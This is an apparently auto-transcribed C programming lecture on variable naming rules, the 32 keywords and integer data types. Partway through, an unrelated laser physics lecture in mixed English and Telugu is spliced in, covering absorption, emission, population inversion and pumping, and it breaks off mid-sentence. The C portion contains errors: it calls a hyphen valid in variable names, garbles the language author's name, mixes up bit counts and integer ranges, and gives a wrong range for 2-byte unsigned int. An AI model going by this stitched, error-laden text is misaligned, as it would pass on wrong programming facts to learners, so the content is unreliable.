like space, hash, dot, underscore is allowed. And every variable name must be unique name. What is meant by unique name? There is no duplicate variables. Once I define the variable, same variable I can't declare in the same line. Maybe in another declaration area you can use. Every variable name must be not a keyword. It is not a keyword. Variable names are our defined. Any word can be used, like Ravi, Raju, serial number, marks, X, Y, I, J, any names. But don't take it as keyword as a variables. Every variable names are case sensitive. What is meant by case sensitive? Like if I use the variable name as a small letter, small only to use. Capital means capital only use. These are the rules to be followed to making of variables. You see which are the valid variables and which are the invalid variables. Here example observe. Which are the valid and invalid you observe. Employee number ENO. I defined as variable ENO. Yes, it is okay because this variable started with alphabet and this is no problem. You see that invalid variable EMP space name space I giving. Spaces are not allowed. In between variable no space. EMP name, here it is valid without space. EMP bracket, it is invalid because of special symbol. EMP hyphen also valid, and here 45, I started the digit 45, it is invalid. Digit cannot start variables. Suppose if I used EMP underscore name, underscore is valid. Int, it's a keyword, you can't define as variables, it's a keyword. Underscore ABC, yes, underscore is allowed, first letter underscore is allowed. Char, it is a keyword, not allowed this. AB45, it's also valid because as a first letter alphabet, remaining letter may be alphabets, may be digits, no problem. But here 45, it's a digits, here digits it will be started. Now these are the invalid variables, these are the valid variables. Every C programming variables, these are the rules to be followed, based on that rules only to define. That is a discussion about variables. Now I want to discuss keywords, like already I discussed the keywords. What is the definition of keyword? Keyword called as what? Which words are already defined by C language author? I mean done is rich already defined. 32 keywords. All C language compiler followed the 32 keywords. These are fixed, you can't change of the keywords. These are also called as reserved words or keywords or built-in words. Built-in words. These are built-in words. Now all C compiler supported these 32 keywords, totally 32 keywords. Every keyword some meaning is there, the meaning already defined. You can't change of the meaning, already defined. But every keyword followed as a case also. Is it keyword is small letter or keyword is capital letter? That should be remember. Mostly C language all keywords are followed by small letters, mostly small letters. Very few keywords are capital letters, mostly all keywords are upper lowercase letters, not a uppercase. You see that what are the keywords we have? Keywords are also called as preserved words, which are already declared to the C compiler, already C compiler defined. C has 32 keywords. You have some list of the keywords. Actually these are not only keywords, some more also there. Here I defined only few keywords, many keywords are there. Auto, double, int, struct, break, else, these all are the keyword. These are only few keywords. Totally how many keywords you have? 32 keywords will be there. Mostly used that all keywords every program may be used, may not be used. And see that whenever you learn the keywords, what is the next you want to move off that? Data types. Whenever you learn the keywords, then data types. Now listen, till whatever I discussed, if whenever you start for learning of C language program, what is my first point? ASCII characters to be understand, American characters.
that is called as C language character sets. After learning of that, what I discussed the keywords, just now I completed which words are already defined by author, those are keywords. 32 keywords are there. And what is one more I discussed the constants. What is meant by constants? Which value cannot changeable, those values are called as constants. Which value can changeable, those are called as variables. And one more also I discussed one more also to use variable naming rules also I discussed. How many rules are there? 6 rules. Every C programming variable making, those rules to be followed, then only you can develop the C programs. What is one more discussion? Data types. In C language, one more important concept, data types. Data types are there. Actually, what is mean by data? Data called as information. What is mean by data type? Which type of information stored in the variable? I mean which type of value stored in the variable, that is decided by data type. Suppose if I want to store the numbers, integer can be used. If I want to store the characters, character to be used. If I want to store the decimal, float to be used. What is the definition of data type? Which type of information stored in the variables, that is decided by data types. C language data types are basically 2 types are there, basic data types, derived data types. C language data types are 2 types, you have basic data types, derived. Basic data types also called as built-in data types, predefined. Derived data types also called as user defined data types, it is a user defined. Basic is built-in, derived types are called as user defined. You see the basic data types: int, float, char, long, double. These are basically predefined or built-in. These are basically, under the some more subtypes also there. Actually these are the major types, but under that subdata types also there, subdata types. Which are the derived types? User defined. I mean programmer should be create this, programmer. Like array can be defined, array can be create. Structures, it is a user defined. Union, it is also user can be defined or derived. Type def, it is also user can be defined. Finally, what is my conclusion? Data types are 2 types of data types. C programming language, data types are 2 categories. First one called as basic types, second one called as derived types. What is meant by basic types? Which data types are already defined by C author defined. What is meant by derived data types? Which types you have to create, user to create or programmer to create, based on the requirement to create the types. Now see, under basic data types, you have some categories. Under basic data types, which are the types are there? Integer, main one is integer data type, character data type, and one more is float data type. These are major. And for the user defined, which are the types are there? Arrays, structures, unions, type def. Those are the user defined data types. Now see, under this basic data types only, subdata types also there. You see that how to work off these data types, it is very important. If you want to work with C language program, data types are most important, how to use of the data types. You see the data types. Suppose if I go for integer type, in C programming language, how to use the integer type? int. What is the syntax of that? int. What is meant by int? Int called as integer, it is a keyword, author defined. Variable means our defined, user defined. It is called as statement. Int is a data type, variable it is a statement. The statement ended with semicolon. Now you see some example. When I mentioned int serial number is a variable, int is a data type. Serial number is a variable name, our defined.
Whenever this variable is integer, I can enter the number 10, it is valid, 10 is valid. If I enter the serial number equal to C, it's a character, don't allow this, it's invalid. If I enter the serial number 10.45, it is also invalid because decimal also invalid. If I enter the minus 10, it's a valid. That means negative value also allowed. Signed, minus indicates signed integer, signed also allowed. When I mention the integer data type, what is the memory occupation of integer? 2 bytes or 4 bytes. Why? Because some operating system like Windows, DOS, you have to use based on the 32-bit or 64-bit 2 bytes. And some some operating systems like Unix, Linux, you can take it as 4 bytes. Now you see, if I use the 2 bytes of integer, what is the maximum number can be defined? 2 bytes. 2 bytes means how many bits? 1 byte equal to 8 bits. 1 byte equal to 8 bits. 2 bytes means 32 bits. Sorry, 16 bits. 2 bytes means 16 bits. What is the range of that? Minus 2 power 15, I mean 16 minus 1 plus 2 power 15 minus 1. This is the range, minus 2 power 15 to plus 2 power 15 minus 1. And if I use the 4 bytes, 4 bytes means 32 bits, minus 2 power 31, it's a fixed, 2 plus 2 power 31 minus 1. Finally, integer type means which only can store, numbers only store, digits only store, cannot store the characters and cannot store the symbols. You can't store the characters, you can't store the symbols. Every integer user can allow sign also allow. Now see, what is meant by integer data type? Under basic data types, integer is the first data type. What is meant by integer data type? It is allowed only numbers or digits. It is not allowed the characters not allowed. It is not allowed the special symbols, only plain numbers allowed. Integer means how much memory occupied? 2 bytes or 4 bytes. Why? Because if you are using with the Windows operating system, 2 bytes. If you are using with the 32-bit or 64-bit, if you are using Unix or Linux, maybe changes of your integer data type memory 4 bytes. If it is 2 bytes, what is the range? 2 bytes means how many bits? 16 bits. 1 byte equal to 8 bits. 2 bytes means 16 bits. What is the range? Minus 2 power 31 to plus 2 power 31 minus 1, that is 4 bytes. If it is 2 bytes means minus 2 power 15 to plus 2 power 15 minus 1. Now this range is a fixed range. In that range only you can enter the numbers. That range is predefined range based on the memory. Now for the integers, allowed only numbers. 2 bytes means minus 2 power 15 to plus 2 power 15 minus 1. 4 bytes means minus 2 power 31 to plus 2 power 31 minus 31 minus 1. Up to that numbers only allowed, more than that not allowed. Is it integer allowed the signed values? Yes, integer allowed the signed values. Negative integer also allowed, positive integer also allowed. Negative sign also allowed, positive sign also allowed. One more type of integer also there, that type of integer called as unsigned integer. Here I am discussing integer, mostly used integer. One more type also there under integer, unsigned integer. What is meant by unsigned integer? Unsigned indicates only for positive values. Whenever you defined unsigned keyword, before int unsigned keyword, it is allowed only positive values. There is no negative values. Unsigned integer also how much memory? 2 bytes. What is the range can be defined? Every unsigned range 0 to be start, 0 number, there is no negative.
0 only to start. 0 to 2 to the power of 15 minus 1. If it is 4 bytes means 0 to 2 to the power of 32 minus 1. Finally, what is the difference of int and unsigned int? Int means a positive and negative values. Unsigned means only positive values. Now these are the integer data type I discussed under C language data types. Some more data types in the next session I will continue. In the next session some more data types will be discussed. Thank you for Good afternoon. Today I am going to discuss about lasers. So in this lasers we will be having three subtopics. One is laser fundamentals, the other one is different types of lasers which are studying in this semester, and the last one is applications of lasers in various fields. So first of all, what is meant by a laser? Laser is an acronym for an abbreviation, or its abbreviation is light amplification by stimulated emission of radiation. So the total laser stands for light amplification by stimulated emission of radiation. In this there will be two processes mainly involved. One is light will be amplified, and the other one is the process which with the light will be amplified is called as stimulated emission. So now we are going to discuss all these topics one by one. First of all, the theoretical basis for this laser was given by the famous scientist Albert Einstein. He used the photon concept for explaining the photoelectric effect. Based on this photon effect only, the entire lasers was built up. So the laser was a consequence of wave particle duality. That means there will be two natures. One is the wave nature and the other one is the particle nature for the light. This is based upon the de Broglie concept, that is every moving particle is always associated with a wave. Next, the first laser is initially called as maser. Maser means microwave amplification by stimulated emission of radiation. This was developed by the scientist named C.H. Townes in 1951. So in this device, Townes used the ammonia molecules and produced the maser, which is of having wavelength 1 centimeters. So by using this device he amplified the microwaves. Next, the first laser was prepared by the scientist named Theodore Maiman in 1960. So he employed the ruby rod, which is surrounded by a helical xenon flash lamp, and generated a laser beam of wavelength 6943 nanometers, 694.3 nanometers. So what are the basic concepts of laser? There will be 5 concepts involved in this laser. The first one is absorption, the other one is spontaneous emission, the next one is stimulated emission, and the fourth one is population inversion, and the last one is lasing action. తెలుగులో అబ్జార్ప్షన్ ని శోషణం అంటారు, స్పాంటేనియస్ ఎమిషన్ ని స్వచ్ఛంద ఉద్గారం అంటారు, స్టిమ్యులేటెడ్ ఎమిషన్ ని ఉత్తేజిత ఉద్గారం అంటారు, పాపులేషన్ ఇన్వర్షన్ ని జనాభా విలోమం అంటారు, అదేవిధంగా లేజింగ్ యాక్షన్ ని లేజింగ్ చర్య అంటారు. ఈ 5 చర్యల మీద లేజర్ మొత్తం నిర్మితమవుతుంది. అందులో ఒక్కొక్క దాని గురించి వివరంగా తెలుసుకుందాం. ఫస్ట్ వన్ ఈజ్ అబ్జార్ప్షన్. First one is absorption. In this absorption process, according to electron structure,
every atom consists of a centrally surround nucleus in which the positive charge and the entire mass of the atom is supposed to be concentrated. ప్రతి పరమాణులో మధ్యలో ధనావేశం మరియు మొత్తం పరమాణు యొక్క భారం మొత్తం కలిగిన ఒక ప్రాంతం ఉంటుంది. ఆ ప్రాంతాన్ని కేంద్రకం అంటారు. ఈ కేంద్రకం చుట్టూ వివిధ వృత్తాకార కక్షల్లో ఎలక్ట్రాన్లు పరిభ్రమిస్తూ ఉంటాయి. Around this nucleus, the electrons will be moving in different orbits. As long as the electron is moving in that orbit, the total energy of the electron remains constant, which is called as stationary orbit. ఎలక్ట్రాన్ కక్షలో తిరుగుతున్నంతసేపు దాని యొక్క మొత్తం శక్తి స్థిరంగా ఉంటుంది కనుక ఆ కక్షల్ని స్థిర కక్షలు అంటారు. ఎలక్ట్రాన్ ఒక కక్ష నుంచి ఇంకొక కక్షకి సంక్రమణం జరిపినప్పుడు దాని శక్తిలో మార్పులు వస్తాయి. whenever the electron moves from one state to another state, there will be transitions, there will be changes in the energies. అయితే ద హైయెస్ట్ ఫిల్డ్ ఎలక్ట్రాన్ ఆర్బిట్ ఈజ్ కాల్డ్ యాజ్ ఇట్స్ గ్రౌండ్ స్టేట్. ఎలక్ట్రాన్లచే ఆవరించబడిన కక్షను చివరి కక్షను దాని యొక్క భూస్థాయి అంటాము. భూస్థాయికి ఉన్న పైనున్న స్థాయిలో ఎటువంటి ఎలక్ట్రాన్లు ఉండవు, వాటిని ఉత్తేజిత శక్తి స్థాయిలు అంటాము. ద ఎనర్జీ స్టేట్స్ అబౌవ్ ద గ్రౌండ్ స్టేట్ ఆర్ ఆల్మోస్ట్ ఆల్ ఎంప్టీ అండ్ దెర్ విల్ బి నో ఎలక్ట్రాన్ ప్రెజెంట్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్స్ నార్మల్లీ. Now, on absorption of energy, the electron moves to these excited states. ఎలక్ట్రాన్ శక్తిని శోషించుకున్నప్పుడు అది పైనున్న శక్తి స్థాయిలకి ఉత్తేజితం పొందుతుంది. ఈ పక్కనున్న చిత్రపటంలో ఇన్ దిస్ ఫిగర్ వీ కెన్ క్లియర్లీ అబ్జర్వ్ దట్ అవుట్ ఆఫ్ ద 6 colors that are emitting from the light source, the orange color is absorbed by the electron which is rotating around the nucleus. ఇందులో కనుక మనం పరిశీలించగలిగితే ఈ కేంద్రకం చుట్టూ తిరుగుతున్న ఎలక్ట్రాను దాని మీద పడుతున్న 6 కిరణాల్లో ఆరెంజ్ కలర్ని అది అబ్జార్బ్ చేసుకుని పైనున్న సెకండ్ ఆర్బిట్లోకి ఎంటర్ అవుతుంది. కనుక ఆ అబ్జార్ప్షన్ స్పెక్ట్రంలో మనకి ఆరెంజ్ కలర్ అనేది కనబడదు. అయితే ఈ ఎలక్ట్రాను ఎగ్జైటెడ్ స్టేట్లో వెళ్ళినప్పుడు ఆ శక్తి శోషణం అనేది ఫోటాన్ల రూపంలో జరుగుతుంది. ఎలక్ట్రాను ఉత్తేజిత శక్తి స్థాయిలో కొంత సమయం మాత్రమే గడుపుతుంది. ఈ గడిపే సమయాన్ని దాని యొక్క జీవితకాలం అంటాము. ద టైమ్ స్పెండ్ బై ద ఎలక్ట్రాన్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్ ఈస్ కాల్డ్ యాజ్ ఇట్స్ లైఫ్ టైమ్. ఆ లైఫ్ టైం అనేది తీసుకున్న పరమాణువు మీద డిపెండ్ అవుతుంది. అంటే డిఫరెంట్ మెటీరియల్స్ విల్ బి హ్యావింగ్ డిఫరెంట్ లైఫ్ టైమ్స్. నెక్స్ట్ ఎమిషన్, రెండో ప్రాసెస్. ఎలక్ట్రాను హయ్యర్ ఎనర్జీ స్టేట్ నుంచి లోవర్ ఎనర్జీ స్టేట్కి వచ్చినప్పుడు అది అబ్జార్బ్ చేసుకున్న ఎనర్జీని మళ్ళా రిలీజ్ చేస్తుంది. ఆ రిలీజ్ అయిన ఎనర్జీ మనకి ఫోటాన్ రూపంలో బయటికి ఎమిట్ అవుతుంది. నెక్స్ట్ ఎమిషన్ విల్ బి ఆఫ్ 2 types. అందులో ఒకటి స్పాంటేనియస్ ఎమిషను, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్. అయితే ఈ అబ్జార్ప్షన్ ఎమిషన్ రెండు కూడా ఈ ఫిగర్లో మనం క్లియర్గా గమనించవచ్చు. ద ఎలక్ట్రాన్ అనేది ఇక్కడ రెండో ఆర్బిట్లో తిరుగుతుంది. దాని మీద పడుతున్న ఎల్లో కలర్ ఎనర్జీలో ఈ ఎలక్ట్రాన్ అనేది ఎనర్జీని అబ్జార్బ్ చేసుకోవడం వల్ల ఒక్కొక్క ఆర్బిట్ చేంజ్ అవుతూ ఆ చివరి ఆర్బిట్లోకి వస్తుంది. దీన్నే మనం శోషణ ప్రక్రియ అంటాము. అదేవిధంగా చివరనున్న ఆర్బిట్ నుంచి ఎలక్ట్రాన్ ఎనర్జీని రిలీజ్ చేసుకుంటూ కిందనున్న లోవర్ ఎనర్జీ ఆర్బిట్స్కి వస్తుంది. ఈ సమయంలో మనకి శక్తి అనేది ఫోటాన్ల రూపంలో బయటికి విడుదలవ్వడాన్ని క్లియర్గా గమనించవచ్చు. సో హియర్ red color photon will be emitted, first one, next one is green color and the other one is blue color. సో 3 రకాల ఫోటాన్లు ఇక్కడ ఎలక్ట్రాన్ ట్రాన్సిషన్ వల్ల మనకి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ ఎమిషన్ ప్రాసెస్ అనేది 2 types. అందులో స్పాంటేనియస్ ఎమిషన్ ఒకటి, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్. స్పాంటేనియస్ ఎమిషన్లో ఏం జరుగుతుంది? స్పాంటేనియస్ ఎమిషన్ అనేది న్యాచురల్ ప్రాసెస్. అంటే ఎలక్ట్రాన్ దాన్నంతట అది కిందనున్న శక్తి స్థాయిలకు వస్తుంది, న్యాచురల్గా వస్తుంది. ఈ ప్రాసెస్లో ఎలక్ట్రాన్ లాస్ అయిన ఎనర్జీ ఒక సింగిల్ ఫోటాన్ రూపంలో ఎమిట్ అవుతుంది. అదేవిధంగా ఈ వెలువడిన ఫోటాన్కి ర్యాండమ్ డైరెక్షన్ ఉంటుంది, ర్యాండమ్ ఫేజ్ ఉంటుంది. దీని వాల్యూ ఇంత ఉంటుందని మనం ఖచ్చితంగా నిర్ధారించలేము. సేమ్ లెవెల్లో కొన్ని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాను దానంతట అది కిందికి రాదు. అనగా అటువంటి స్టేట్స్లో ఎలక్ట్రాన్ గడిపే కాలం చాలా ఎక్కువగా ఉంటుంది. అంటే దాని లైఫ్ టైం అనేది ఆ స్టేట్స్లో చాలా ఎక్కువగా ఉంటుంది. అటువంటి స్టేట్స్ని మనం మెటాస్టేబుల్ స్టేట్స్ అంటాము. ఇక్కడికి వచ్చేసరికి ఇందులో మనం స్పాంటేనియస్ ఎమిషన్ని క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇది న్యూక్లియస్. ఈ న్యూక్లియస్ చుట్టూ
ఫస్ట్ ఆర్బిట్ అనేది గ్రీన్ ఆర్బిట్, ఈ గ్రీన్ ఆర్బిట్ తర్వాత ఉన్న రెడ్ ఆర్బిట్ ఎగ్జైటెడ్ స్టేట్ ఆఫ్ ద ఎలక్ట్రాను, గ్రీన్ ఆర్బిట్ గ్రౌండ్ స్టేటు. ఎలక్ట్రాన్ అనేది ఈ రెడ్ ఆర్బిట్లో నుంచి అనగా ఎగ్జైటెడ్ స్టేట్లో నుంచి లోవర్ ఎనర్జీ స్టేట్కి వచ్చినప్పుడు ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ ఫోటాన్కి అనేది ర్యాండమ్ ఫేజ్ ఉంటుంది, అదేవిధంగా దాని యొక్క డైరెక్షన్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ స్టిమ్యులేటెడ్ ఎమిషన్. మెటాస్టేబుల్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాన్ దాన్నంతట అది కిందికి రాదు. అటువంటి ఎలక్ట్రాన్ కిందికి రావాలంటే దాని మీద ఏదో ఒక ఎక్స్టర్నల్ ఇన్ఫ్లుయెన్స్ పనిచేయాలి. ఆ ఎక్స్టర్నల్ ఇన్ఫ్లుయెన్స్ ఏంటి? ఎలక్ట్రాన్ మీద ఒక ఫోటాన్ అనేది కొలైడ్ అయినప్పుడు ఖచ్చితంగా ఎలక్ట్రాన్ అనేది లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. అది మనం ఈ ఫిగర్లో క్లియర్గా గమనించవచ్చు. S1 అనేది ఎగ్జైటెడ్ స్టేటు, S0 అనేది మనకి గ్రౌండ్ స్టేటు. S1 స్టేటు అనేది మెటాస్టేబుల్ స్టేట్. ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక పార్టికల్ లేదా ఎలక్ట్రాన్ అనేది కిందికి రావాలంటే దాని మీద hν ఎనర్జీ కలిగిన ఈ ఫోటాన్ అనేది ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాను ఎనర్జీని లాస్ అవుతూ కిందనున్న S0 స్టేట్కి వస్తుంది. అయితే ఈ లాస్ అయిన ఎనర్జీ ఒక ఫోటాన్ రూపంలో వస్తుంది. అయితే ఇక్కడికి వచ్చేసరికి ఏంటంటే కండిషను, ఈ ఎనర్జీ లాస్ అయినప్పుడు ఫోటాన్కి ఎంత అయితే ఎనర్జీ అయితే ఉంటుందో, ఎంత ఫ్రీక్వెన్సీ ఉంటుందో, ఎంత వేవ్ లెంత్ అయితే ఉంటుందో, ఇన్సిడెంట్ ఫోటాన్కి కూడా సేమ్ ఫ్యాక్టర్స్ ఉండాలి. అనగా ఈ ప్రాసెస్లో మనకి 2 ఫోటాన్స్ వస్తాయి. ఈ ప్రాసెస్లో 2 ఫోటాన్స్ వస్తాయి. ఒక ఫోటాను దాని మీద ఇన్సిడెంట్ అవుతున్న ఫోటాను, ఇంకొకటి ఎనర్జీ లాస్ట్ బై ద ఎలక్ట్రాన్. సో ఈ 2 ఫోటాన్స్కి ఒకే వేవ్ లెంత్ ఉంటుంది. నెక్స్ట్ బోత్ విల్ బీ ట్రావెలింగ్ ఇన్ సేమ్ డైరెక్షన్, రెండు ఒకే డైరెక్షన్లో ట్రావెల్ చేస్తాయి. అలాగే రెండింటి యొక్క ఫేజ్ అనేది ఈక్వల్గా ఉంటుంది. సో ఆ ప్రాసెస్ని మళ్ళీ ఇక్కడ మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇందులో ఫస్ట్ వన్, దిస్ ఈజ్ ద ఎలక్ట్రాన్ విచ్ ఈజ్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్ E1 అనే ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ బ్లూ కలర్లో ఉంది. అది సెకండ్ ఫిగర్లోకి వచ్చేసరికి ఆ ఎలక్ట్రాన్ మీద hν ఎనర్జీ కలిగిన ఒక రెడ్ కలర్ ఫోటాన్ ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాన్ ఎనర్జీని కోల్పోతూ కిందకు వస్తుంది. ఈ టోటల్ ప్రాసెస్లో 2 ఫోటాన్స్ అనేవి మనకి ఎమిట్ అవుతున్నాయి. సో బిఫోర్ కొలిషన్ ఎలక్ట్రాన్ ఎగ్జైటెడ్ స్టేట్లో ఉంటే, ఆఫ్టర్ కొలిషన్ ఎలక్ట్రాన్ గ్రౌండ్ స్టేట్కి వచ్చింది. కొలిషన్ తర్వాత మనకి 2 ఫోటాన్స్ అనేవి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ స్పాంటేనియస్ అండ్ స్టిమ్యులేటెడ్ ఎమిషన్స్. ఈ రెండు కూడా మనం ఈ ఫిగర్లో క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో ఇక్కడికి వచ్చేసరికి పైదాన్లో ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాను న్యాచురల్గా కిందకు వస్తుంది. ఈ సమయంలో ఎమిట్ అయిన ఫోటాన్కి ర్యాండమ్ డైరెక్షన్ ఉంటుంది, అదేవిధంగా ఫేజ్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ కిందనున్న స్టిమ్యులేటెడ్ ఎమిషన్ ఫిగర్లో చూస్తే ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్పై ఒక ఫోటాన్ ఇన్సిడెంట్ అయినప్పుడు ఈ ఫోటాన్తో ఈ ఎలక్ట్రాన్ కొలైడ్ అయ్యి కిందనున్న గ్రౌండ్ స్టేట్కి వస్తుంది. గ్రౌండ్ స్టేట్కి వచ్చినప్పుడు ఈ లాస్ అయిన ఎనర్జీ ఫస్ట్ ఫోటాన్ రూపంలో వస్తే రెండో ఫోటాను ఈ ఇన్సిడెంట్ ఫోటాన్కి అవుతుంది. కనుక రెండింటి మధ్య ఒకే డైరెక్షన్లో ఉంటాయి, రెండు సేమ్ వేవ్ లెంత్ కలిగి ఉంటాయి, అలాగే రెండు కూడా ఒకే ఫేజ్లో ఉంటాయి. దిస్ ప్రాసెస్ ఈజ్ ద స్టిమ్యులేటెడ్ ఎమిషన్. నెక్స్ట్ వన్ ఈజ్ పాపులేషన్ ఇన్వర్షన్. అయితే ఈ పాపులేషన్ ఇన్వర్షన్లో ఏం జరుగుతుంది? జనరల్గా మనకి ఎగ్జైటెడ్ స్టేట్లో ఎలక్ట్రాన్స్ నెంబర్ చాలా తక్కువగా ఉంటుంది. ఎందుకంటే మనం చెప్పుకున్నప్పుడే గ్రౌండ్ స్టేట్ గురించి చెప్పుకున్నాం. ఏంటి? హైయెస్ట్ ఫిల్డ్ ఆర్బిట్ అయితే ఏదైతే ఉందో దాన్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్పుకున్నాం. కనుక గ్రౌండ్ స్టేట్లో ఎక్కువ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ ఉంటాయి. ఫర్ ఎగ్జాంపుల్ ఇక్కడ 2 స్టేట్స్ తీసుకున్నా, ఒకటి E1 అండ్ ద అదర్ వన్ ఈజ్ E2. ఇందులో E1లో మనకి ఈ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంది. E2లో ఈ పార్టికల్స్ నెంబరు అస్సలు లేదు, లేదా 0 కింద చెప్పొచ్చు. అయితే ఇక్కడ పార్టికల్స్ అనేవి ఎక్కువగా ఈ స్టేట్లో ఉన్నాయి కాబట్టి ఈ స్టేట్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్తాం. నెక్స్ట్ E2లో ఎటువంటి పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ లేవు కనుక ఇది ఎగ్జైటెడ్ స్టేట్స్. జనరల్గా గ్రౌండ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంటుంది కంపేర్డ్ టు ద నెంబర్ ఆఫ్ పార్టికల్స్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్. అయితే అబ్జార్ప్షన్ ప్రాసెస్లో ఏమవుతుందంటే ఈ గ్రౌండ్ స్టేట్లో ఉన్న ఈ పార్టికల్స్ ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్ అయినటువంటి E2 స్టేట్లోకి వెళ్తాయి. ఫలితంగా ఈ ఎలక్ట్రాన్స్ లేదా పార్టికల్స్ యొక్క నెంబరు ఎగ్జైటెడ్ స్టేట్లో గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఈ ఫిగర్లో మనం గమనిస్తే ఫస్ట్ పార్టికల్ అనేది ఎగ్జైటెడ్ స్టేట్కి వెళ్ళింది, అదేవిధంగా మిగతా పార్టికల్స్ అన్నీ కూడా ఒకదాని తర్వాత ఒకటి ఎనర్జీని అబ్జార్బ్ చేసుకుంటూ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళాయి. సో ఏదో ఒక స్టేజ్లో ఎలక్ట్రాన్ అనేది మెటాస్టేబుల్ స్టేట్లోకి ఎంటర్ అవుతే ఆ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ తిరిగి కిందకి రాదు. సో హైయర్ ఎనర్జీ స్టేట్ నుంచి మెటాస్టేబుల్ స్టేట్లోకి వెళ్ళిన ఎలక్ట్రాన్ కిందకి రాదు, కానీ మిగతా స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్ కిందకి వచ్చేస్తాయి. సో ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ కిందకి రాకపోవడం వల్ల అక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది.
ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం జాగ్రత్తగా చూడగలిగితే ఈ కింద నుంచి ఎలక్ట్రాన్స్ అన్నీ ఈ స్టేట్కి వెళ్ళి ఈ స్టేట్ నుంచి ఈ కింద స్టేట్కి వచ్చాయి. ఈ కింద స్టేట్ మెటాస్టేబుల్ స్టేట్ కనుక ఇక్కడికి వెళ్ళిన ఎలక్ట్రాను దానంతటది కిందికి రాకపోవడం వల్ల ఇక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఏదో ఒకానొక సందర్భంలో మనకి ఈ ఎలక్ట్రాన్స్ యొక్క నెంబరు కిందనున్న గ్రౌండ్ స్టేట్ నెంబర్ కన్నా చాలా ఎక్కువగా ఉంటుంది. అంటే ఫస్ట్ వచ్చిన స్టేట్కి ఇది ఇన్వర్స్ స్టేట్ కాబట్టి దీన్ని మనం పాపులేషన్ ఇన్వర్షన్ అంటాము. సో తెలుగులో దీన్ని జనాభా విలోమము. ఈ ఫిగర్లో మనం క్లియర్ కట్గా ఈ స్టేట్స్ అన్నీ కూడా మనం క్లియర్ కట్గా అబ్జర్వ్ చేయొచ్చు. సో నెక్స్ట్ వన్ ఈజ్ పంపింగ్. అయితే మనకి లేజర్లో ఖచ్చితంగా ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వాలి అంటే పంపింగ్ ప్రాసెస్ అనేది జరగాలి. పంపింగ్ ప్రాసెస్ అంటే ఏంటి? పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడానికి మనకి కావాల్సిన మెకానిజంనే పంపింగ్ కింద చెప్పొచ్చు. అయితే పంపింగ్ అనేది ఎన్ని రకాలుగా ఉంటుంది? మనకి డిఫరెంట్ టైప్స్ ఆఫ్ పంపింగ్ మెకానిజమ్స్ మనకి డే టు డే లైఫ్లో ఉన్నాయి. అందులో ఫస్ట్ వన్ ఈజ్ ఆప్టికల్ పంపింగ్, రెండోది ఎలక్ట్రికల్ పంపింగ్, మూడోది కెమికల్ పంపింగ్ అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్. సో ఈ పంపింగ్ మెకానిజమ్స్లో జరిగే ప్రక్రియ ఏంటి? ఫస్ట్ ఆప్టికల్ పంపింగ్లో మనం గ్యాషియస్ డిశ్చార్జ్ కానీ లేదా ఫ్లాష్ ట్యూబ్స్ కానీ వాడతాము. ఎగ్జాంపుల్ మనకి ఉన్నది రుబిలైజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జెస్ ఉపయోగించి పంపింగ్ ప్రాసెస్ కనుక జరిపితే అది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం కింద వస్తుంది. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ థర్డ్ వన్ ఈజ్ కెమికల్ పంపింగ్. ఇందులో మనకి ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ని మనం వాడతాము. ఈ ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ వల్ల ఎమిట్ అయిన ఎనర్జీని ఈ పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్కి వెళ్తాయి. కనుక ఇక్కడ పంపింగ్ ప్రాసెస్కి వాడేది కెమికల్ రియాక్షన్స్. అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్. ఈ థర్మల్ 